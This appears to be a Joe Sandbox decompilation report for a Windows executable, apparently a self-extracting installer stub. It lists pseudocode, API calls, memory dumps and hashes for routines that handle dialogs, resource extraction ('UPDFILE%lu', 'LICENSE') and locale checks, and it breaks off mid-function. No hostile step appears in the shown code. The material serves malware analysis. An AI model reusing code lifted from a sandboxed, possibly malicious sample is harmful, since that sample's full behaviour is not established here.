                                                                        Similarity
                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                        • API String ID: 4204503880-1888249752
                                                                        • Opcode ID: 00a3177e7d115689877bd69aea02f5d92d0c4aee8643ad7ad999bee1689125a2
                                                                        • Instruction ID: d286d753a58efafb6c3093c82453154982e7cb8f8cc7c75271977c7b2def68ec
                                                                        • Opcode Fuzzy Hash: 00a3177e7d115689877bd69aea02f5d92d0c4aee8643ad7ad999bee1689125a2
                                                                        • Instruction Fuzzy Hash: 5A119371E00219ABDB14DFE4DC49ABEBB78EF45701F100569F942E2290DB308D018B95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A33450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t7;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				int _t22;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t7 = _a8 - 0x10;
                                                                        				if(_t7 == 0) {
                                                                        					EndDialog(_a4, 2);
                                                                        					L11:
                                                                        					return 1;
                                                                        				}
                                                                        				_t11 = _t7 - 0x100;
                                                                        				if(_t11 == 0) {
                                                                        					_t12 = GetDesktopWindow();
                                                                        					_t24 = _a4;
                                                                        					E00A343D0(_t24, _t12);
                                                                        					SetWindowTextA(_t24, "zhiga");
                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xa39404);
                                                                        					SetForegroundWindow(_t24);
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t11 == 1) {
                                                                        					_t22 = _a12;
                                                                        					if(_t22 < 6) {
                                                                        						goto L11;
                                                                        					}
                                                                        					if(_t22 <= 7) {
                                                                        						L8:
                                                                        						EndDialog(_a4, _t22);
                                                                        						return 1;
                                                                        					}
                                                                        					if(_t22 != 0x839) {
                                                                        						goto L11;
                                                                        					}
                                                                        					 *0xa391dc = 1;
                                                                        					goto L8;
                                                                        				}
                                                                        				return 0;
                                                                        			}








                                                                        0x00a33459
                                                                        0x00a3345c
                                                                        0x00a334d8
                                                                        0x00a334de
                                                                        0x00000000
                                                                        0x00a334e0
                                                                        0x00a3345e
                                                                        0x00a33463
                                                                        0x00a3349a
                                                                        0x00a334a0
                                                                        0x00a334a7
                                                                        0x00a334b2
                                                                        0x00a334c4
                                                                        0x00a334cb
                                                                        0x00000000
                                                                        0x00a334cb
                                                                        0x00a33468
                                                                        0x00a3346e
                                                                        0x00a33474
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3347c
                                                                        0x00a3348c
                                                                        0x00a33490
                                                                        0x00000000
                                                                        0x00a33496
                                                                        0x00a33484
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33486
                                                                        0x00000000
                                                                        0x00a33486
                                                                        0x00000000

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00A33490
                                                                        • GetDesktopWindow.USER32 ref: 00A3349A
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00A334B2
                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00A334C4
                                                                        • SetForegroundWindow.USER32(?), ref: 00A334CB
                                                                        • EndDialog.USER32(?,00000002), ref: 00A334D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                        • String ID: zhiga
                                                                        • API String ID: 852535152-3705506974
                                                                        • Opcode ID: f0eede38bf6ef9a3bcd5efd54bd83c511e51678c7cb2d91704bd590cae73570e
                                                                        • Instruction ID: f9dfdd2a2ccd5f2c029cd51cdb44e1304b38686515a94fcc577e79ea7391ee6d
                                                                        • Opcode Fuzzy Hash: f0eede38bf6ef9a3bcd5efd54bd83c511e51678c7cb2d91704bd590cae73570e
                                                                        • Instruction Fuzzy Hash: 0001F733248224ABDF169FA5DC0C9AE7B64EF19702F008110F987965B1CB719F43DB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00A32AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				int _t21;
                                                                        				char _t32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				CHAR* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				CHAR* _t59;
                                                                        				void* _t62;
                                                                        				CHAR* _t64;
                                                                        				CHAR* _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t60 = __edx;
                                                                        				_t16 =  *0xa38004; // 0xb6b6972c
                                                                        				_t17 = _t16 ^ _t66;
                                                                        				_v8 = _t16 ^ _t66;
                                                                        				_t65 = _a4;
                                                                        				_t44 = __edx;
                                                                        				_t64 = __ecx;
                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                        					GetModuleFileNameA( *0xa39a3c,  &_v268, 0x104);
                                                                        					while(1) {
                                                                        						_t17 =  *_t64;
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                        						 *_t65 =  *_t64;
                                                                        						if(_t21 != 0) {
                                                                        							_t65[1] = _t64[1];
                                                                        						}
                                                                        						if( *_t64 != 0x23) {
                                                                        							L19:
                                                                        							_t65 = CharNextA(_t65);
                                                                        						} else {
                                                                        							_t64 = CharNextA(_t64);
                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                        									if( *_t64 == 0x23) {
                                                                        										goto L19;
                                                                        									}
                                                                        								} else {
                                                                        									E00A31680(_t65, E00A317C8(_t44, _t65),  &_v268);
                                                                        									_t52 = _t65;
                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                        									_t60 = _t14;
                                                                        									do {
                                                                        										_t32 =  *_t52;
                                                                        										_t52 =  &(_t52[1]);
                                                                        									} while (_t32 != 0);
                                                                        									goto L17;
                                                                        								}
                                                                        							} else {
                                                                        								E00A365E8( &_v268);
                                                                        								_t55 =  &_v268;
                                                                        								_t62 = _t55 + 1;
                                                                        								do {
                                                                        									_t34 =  *_t55;
                                                                        									_t55 = _t55 + 1;
                                                                        								} while (_t34 != 0);
                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                        									 *_t38 = 0;
                                                                        								}
                                                                        								E00A31680(_t65, E00A317C8(_t44, _t65),  &_v268);
                                                                        								_t59 = _t65;
                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                        								_t60 = _t12;
                                                                        								do {
                                                                        									_t42 =  *_t59;
                                                                        									_t59 =  &(_t59[1]);
                                                                        								} while (_t42 != 0);
                                                                        								L17:
                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                        							}
                                                                        						}
                                                                        						_t64 = CharNextA(_t64);
                                                                        					}
                                                                        					 *_t65 = _t17;
                                                                        				}
                                                                        				return E00A36CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                        			}






















                                                                        0x00a32aac
                                                                        0x00a32ab7
                                                                        0x00a32abc
                                                                        0x00a32abe
                                                                        0x00a32ac3
                                                                        0x00a32ac6
                                                                        0x00a32ac9
                                                                        0x00a32ace
                                                                        0x00a32ae6
                                                                        0x00a32bdc
                                                                        0x00a32bdc
                                                                        0x00a32be0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32af2
                                                                        0x00a32afc
                                                                        0x00a32b00
                                                                        0x00a32b05
                                                                        0x00a32b05
                                                                        0x00a32b0b
                                                                        0x00a32bca
                                                                        0x00a32bd1
                                                                        0x00a32b11
                                                                        0x00a32b18
                                                                        0x00a32b26
                                                                        0x00a32b99
                                                                        0x00a32bc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32b9b
                                                                        0x00a32bae
                                                                        0x00a32bb3
                                                                        0x00a32bb5
                                                                        0x00a32bb5
                                                                        0x00a32bb8
                                                                        0x00a32bb8
                                                                        0x00a32bba
                                                                        0x00a32bbb
                                                                        0x00000000
                                                                        0x00a32bb8
                                                                        0x00a32b28
                                                                        0x00a32b2e
                                                                        0x00a32b33
                                                                        0x00a32b39
                                                                        0x00a32b3c
                                                                        0x00a32b3c
                                                                        0x00a32b3e
                                                                        0x00a32b3f
                                                                        0x00a32b55
                                                                        0x00a32b5d
                                                                        0x00a32b64
                                                                        0x00a32b64
                                                                        0x00a32b7a
                                                                        0x00a32b7f
                                                                        0x00a32b81
                                                                        0x00a32b81
                                                                        0x00a32b84
                                                                        0x00a32b84
                                                                        0x00a32b86
                                                                        0x00a32b87
                                                                        0x00a32bbf
                                                                        0x00a32bc1
                                                                        0x00a32bc1
                                                                        0x00a32b26
                                                                        0x00a32bda
                                                                        0x00a32bda
                                                                        0x00a32be6
                                                                        0x00a32be6
                                                                        0x00a32bf8

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A32AE6
                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A32AF2
                                                                        • CharNextA.USER32(?), ref: 00A32B12
                                                                        • CharUpperA.USER32 ref: 00A32B1E
                                                                        • CharPrevA.USER32(?,?), ref: 00A32B55
                                                                        • CharNextA.USER32(?), ref: 00A32BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                        • String ID:
                                                                        • API String ID: 571164536-0
                                                                        • Opcode ID: 38c15ca2d040620062019a3dde25830e540b34fe32679b3769cb3de8c9a491e2
                                                                        • Instruction ID: f03dd6b14643cbf03511828a38774e783f9a690f825074952e2bb8a9ae2e7318
                                                                        • Opcode Fuzzy Hash: 38c15ca2d040620062019a3dde25830e540b34fe32679b3769cb3de8c9a491e2
                                                                        • Instruction Fuzzy Hash: DF4126346042959FDB159F349C54BFDBBB99F66300F14419AF8C287202DB358E87CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00A343D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                        				signed int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				int _v52;
                                                                        				intOrPtr _v56;
                                                                        				int _v60;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				void* _t53;
                                                                        				intOrPtr _t56;
                                                                        				int _t59;
                                                                        				struct HWND__* _t63;
                                                                        				struct HWND__* _t67;
                                                                        				struct HWND__* _t68;
                                                                        				struct HDC__* _t69;
                                                                        				int _t72;
                                                                        				signed int _t74;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t29 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t29 ^ _t74;
                                                                        				_t68 = __edx;
                                                                        				_v44 = __ecx;
                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                        				_v48 = _v40.right - _v40.left;
                                                                        				GetWindowRect(_t68,  &_v24);
                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                        				_t69 = GetDC(_v44);
                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                        				ReleaseDC(_v44, _t69);
                                                                        				_t56 = _v48;
                                                                        				asm("cdq");
                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                        				_t67 = 0;
                                                                        				if(_t72 >= 0) {
                                                                        					_t63 = _v52;
                                                                        					if(_t72 + _t56 > _t63) {
                                                                        						_t72 = _t63 - _t56;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t67;
                                                                        				}
                                                                        				asm("cdq");
                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                        				if(_t59 >= 0) {
                                                                        					_t63 = _v60;
                                                                        					if(_t59 + _t53 > _t63) {
                                                                        						_t59 = _t63 - _t53;
                                                                        					}
                                                                        				} else {
                                                                        					_t59 = _t67;
                                                                        				}
                                                                        				return E00A36CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                        			}
























                                                                        0x00a343d0
                                                                        0x00a343d8
                                                                        0x00a343df
                                                                        0x00a343e6
                                                                        0x00a343ec
                                                                        0x00a343f1
                                                                        0x00a34400
                                                                        0x00a34403
                                                                        0x00a3440b
                                                                        0x00a34420
                                                                        0x00a34429
                                                                        0x00a34437
                                                                        0x00a34444
                                                                        0x00a34447
                                                                        0x00a3444d
                                                                        0x00a34454
                                                                        0x00a3445b
                                                                        0x00a34460
                                                                        0x00a34461
                                                                        0x00a34467
                                                                        0x00a3446f
                                                                        0x00a34473
                                                                        0x00a34473
                                                                        0x00a34463
                                                                        0x00a34463
                                                                        0x00a34463
                                                                        0x00a3447a
                                                                        0x00a34481
                                                                        0x00a34484
                                                                        0x00a3448a
                                                                        0x00a34492
                                                                        0x00a34496
                                                                        0x00a34496
                                                                        0x00a34486
                                                                        0x00a34486
                                                                        0x00a34486
                                                                        0x00a344b8

                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00A343F1
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00A3440B
                                                                        • GetDC.USER32(?), ref: 00A34423
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A3442E
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A3443A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00A34447
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A344A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                        • String ID:
                                                                        • API String ID: 2212493051-0
                                                                        • Opcode ID: 960d4002ec6435f484e9ef0ff923ffc12051bf8442d5067279bd4aa74a3107b2
                                                                        • Instruction ID: 925b26359d53d87bca27a61d9ed74ed9075e788d955136d2013cc4958cfe8aa9
                                                                        • Opcode Fuzzy Hash: 960d4002ec6435f484e9ef0ff923ffc12051bf8442d5067279bd4aa74a3107b2
                                                                        • Instruction Fuzzy Hash: 05312E72E00119AFCB14CFF8DD899EEBBB5EB99310F154269F805F7250DA70AD058B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00A36298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HINSTANCE__* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				struct HRSRC__* _t21;
                                                                        				intOrPtr _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t41;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				struct HINSTANCE__* _t51;
                                                                        
                                                                        				_t44 = __edx;
                                                                        				_t16 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t16 ^ _t50;
                                                                        				_t46 = 0;
                                                                        				_v32 = __ecx;
                                                                        				_v36 = 0;
                                                                        				_t36 = 1;
                                                                        				E00A3171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                        				while(1) {
                                                                        					_t51 = _t51 + 0x10;
                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                        					if(_t45 == 0) {
                                                                        						 *0xa39124 = 0x80070714;
                                                                        						_t36 = _t46;
                                                                        					} else {
                                                                        						_t5 = _t45 + 8; // 0x8
                                                                        						_t44 = _t5;
                                                                        						_t40 = _t44;
                                                                        						_t6 = _t40 + 1; // 0x9
                                                                        						_t47 = _t6;
                                                                        						do {
                                                                        							_t26 =  *_t40;
                                                                        							_t40 = _t40 + 1;
                                                                        						} while (_t26 != 0);
                                                                        						_t41 = _t40 - _t47;
                                                                        						_t46 = _t51;
                                                                        						_t7 = _t41 + 1; // 0xa
                                                                        						 *0xa3a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                        						_t30 = _v32();
                                                                        						if(_t51 != _t51) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						_push(_t45);
                                                                        						if(_t30 == 0) {
                                                                        							_t36 = 0;
                                                                        							FreeResource(??);
                                                                        						} else {
                                                                        							FreeResource();
                                                                        							_v36 = _v36 + 1;
                                                                        							E00A3171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                        							_t46 = 0;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					L12:
                                                                        					return E00A36CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                        				}
                                                                        				goto L12;
                                                                        			}






















                                                                        0x00a36298
                                                                        0x00a362a0
                                                                        0x00a362a7
                                                                        0x00a362ad
                                                                        0x00a362af
                                                                        0x00a362bb
                                                                        0x00a362c3
                                                                        0x00a362c4
                                                                        0x00a3633b
                                                                        0x00a3633b
                                                                        0x00a36345
                                                                        0x00a3634d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a362da
                                                                        0x00a362de
                                                                        0x00a3635f
                                                                        0x00a36369
                                                                        0x00a362e0
                                                                        0x00a362e0
                                                                        0x00a362e0
                                                                        0x00a362e3
                                                                        0x00a362e5
                                                                        0x00a362e5
                                                                        0x00a362e8
                                                                        0x00a362e8
                                                                        0x00a362ea
                                                                        0x00a362eb
                                                                        0x00a362ef
                                                                        0x00a362f1
                                                                        0x00a362f3
                                                                        0x00a36302
                                                                        0x00a36308
                                                                        0x00a3630d
                                                                        0x00a36314
                                                                        0x00a36314
                                                                        0x00a36316
                                                                        0x00a36319
                                                                        0x00a36355
                                                                        0x00a36357
                                                                        0x00a3631b
                                                                        0x00a3631b
                                                                        0x00a36331
                                                                        0x00a36334
                                                                        0x00a36339
                                                                        0x00000000
                                                                        0x00a36339
                                                                        0x00a36319
                                                                        0x00a3636b
                                                                        0x00a3637d
                                                                        0x00a3637d
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00A3171E: _vsnprintf.MSVCRT ref: 00A31750
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A351CA,00000004,00000024,00A32F71,?,00000002,00000000), ref: 00A362CD
                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A351CA,00000004,00000024,00A32F71,?,00000002,00000000), ref: 00A362D4
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A351CA,00000004,00000024,00A32F71,?,00000002,00000000), ref: 00A3631B
                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A36345
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A351CA,00000004,00000024,00A32F71,?,00000002,00000000), ref: 00A36357
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                        • String ID: UPDFILE%lu
                                                                        • API String ID: 2922116661-2329316264
                                                                        • Opcode ID: a782d35202010e145d18dd0fb6aba263385bfe4b9ca23a1fa61b2da084039b09
                                                                        • Instruction ID: 28d64572dd50f0ce0ae9889048602bb0c423f706b26f2ac686cf85a624aad6e7
                                                                        • Opcode Fuzzy Hash: a782d35202010e145d18dd0fb6aba263385bfe4b9ca23a1fa61b2da084039b09
                                                                        • Instruction Fuzzy Hash: 4821F171A00229ABDB14DFA49C499FFBB7CFF49710F044229FA42A7241DB759D028BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A3681F(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				struct _OSVERSIONINFOA _v168;
                                                                        				void* _v172;
                                                                        				int* _v176;
                                                                        				int _v180;
                                                                        				int _v184;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				long _t31;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				intOrPtr _t41;
                                                                        				signed int _t44;
                                                                        
                                                                        				_t36 = __ebx;
                                                                        				_t19 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t19 ^ _t44;
                                                                        				_t41 =  *0xa381d8; // 0xfffffffe
                                                                        				_t43 = 0;
                                                                        				_v180 = 0xc;
                                                                        				_v176 = 0;
                                                                        				if(_t41 == 0xfffffffe) {
                                                                        					 *0xa381d8 = 0;
                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                        						L12:
                                                                        						_t41 =  *0xa381d8; // 0xfffffffe
                                                                        					} else {
                                                                        						_t41 = 1;
                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t31 = RegQueryValueExA(_v172, 0xa31140, 0,  &_v184,  &_v20,  &_v180);
                                                                        							_t43 = _t31;
                                                                        							RegCloseKey(_v172);
                                                                        							if(_t31 != 0) {
                                                                        								goto L12;
                                                                        							} else {
                                                                        								_t40 =  &_v176;
                                                                        								if(E00A366F9( &_v20,  &_v176) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									_t35 = _v176 & 0x000003ff;
                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                        										 *0xa381d8 = _t41;
                                                                        									} else {
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                        			}


















                                                                        0x00a3681f
                                                                        0x00a3682a
                                                                        0x00a36831
                                                                        0x00a36836
                                                                        0x00a3683c
                                                                        0x00a3683e
                                                                        0x00a36848
                                                                        0x00a36851
                                                                        0x00a3685d
                                                                        0x00a36864
                                                                        0x00a36876
                                                                        0x00a3693a
                                                                        0x00a3693a
                                                                        0x00a3687c
                                                                        0x00a3687e
                                                                        0x00a36885
                                                                        0x00000000
                                                                        0x00a368d6
                                                                        0x00a368f4
                                                                        0x00a36900
                                                                        0x00a36902
                                                                        0x00a3690a
                                                                        0x00000000
                                                                        0x00a3690c
                                                                        0x00a3690c
                                                                        0x00a3691c
                                                                        0x00000000
                                                                        0x00a3691e
                                                                        0x00a36924
                                                                        0x00a3692b
                                                                        0x00a36932
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3692b
                                                                        0x00a3691c
                                                                        0x00a3690a
                                                                        0x00a36885
                                                                        0x00a36876
                                                                        0x00a36951

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A3686E
                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00A368A7
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A368CC
                                                                        • RegQueryValueExA.ADVAPI32(?,00A31140,00000000,?,?,0000000C), ref: 00A368F4
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00A36902
                                                                          • Part of subcall function 00A366F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A3691A), ref: 00A36741
                                                                        Strings
                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00A368C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                        • API String ID: 3346862599-1109908249
                                                                        • Opcode ID: 7bc293b771e212913f2cf32ab61eb20c772b9feef098d37f3f957622bf379370
                                                                        • Instruction ID: 5884c6b52a725b82cde2b163f8f4a09ad3ac4ba9856ab38f1d6c2cb5429cf578
                                                                        • Opcode Fuzzy Hash: 7bc293b771e212913f2cf32ab61eb20c772b9feef098d37f3f957622bf379370
                                                                        • Instruction Fuzzy Hash: 5A319331A00328EFDB31CB51CC45BAAB778FB45764F1041A5F94DA6250DB709E86CF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A33A3F(void* __eflags) {
                                                                        				void* _t3;
                                                                        				void* _t9;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = "LICENSE";
                                                                        				_t1 = E00A3468F(_t16, 0, 0) + 1; // 0x1
                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                        				 *0xa38d4c = _t3;
                                                                        				if(_t3 != 0) {
                                                                        					_t19 = _t16;
                                                                        					if(E00A3468F(_t16, _t3, _t28) != 0) {
                                                                        						if(lstrcmpA( *0xa38d4c, "<None>") == 0) {
                                                                        							LocalFree( *0xa38d4c);
                                                                        							L9:
                                                                        							 *0xa39124 = 0;
                                                                        							return 1;
                                                                        						}
                                                                        						_t9 = E00A36517(_t19, 0x7d1, 0, E00A33100, 0, 0);
                                                                        						LocalFree( *0xa38d4c);
                                                                        						if(_t9 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						 *0xa39124 = 0x800704c7;
                                                                        						L2:
                                                                        						return 0;
                                                                        					}
                                                                        					E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree( *0xa38d4c);
                                                                        					 *0xa39124 = 0x80070714;
                                                                        					goto L2;
                                                                        				}
                                                                        				E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xa39124 = E00A36285();
